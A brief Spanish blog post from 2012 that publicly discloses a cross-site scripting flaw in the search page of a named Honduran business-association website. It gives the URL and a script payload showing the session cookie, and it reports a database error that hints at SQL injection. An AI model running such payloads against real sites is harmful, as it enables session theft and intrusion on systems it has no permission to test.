martes, 10 de enero de 2012

[XSS] AMCHAM – Honduras , iSQL en ASP

9:12 Anónimo No comments

El error de XSS se encuentra en el buscador en español de dicha web

http://www.amchamhonduras.org/buscar_es.asp

Al realizar la siguiente busqueda por ejemplo podriamos robar cookies de sesion :

<script>
 alert ('Mi Cookie!:'+document.cookie)
</script>


Y por su fuera poco esto tambien genera un error en la base de datos:
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.


Hasta la PROXYma 

Posted in:

0 comentarios :

Publicar un comentario

Twitter Delicious Facebook Digg Stumbleupon Favorites More
RSS Feed Subscribe to Our RSS feed!
Sígueme en Twitter! Sígueme en Twitter!

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host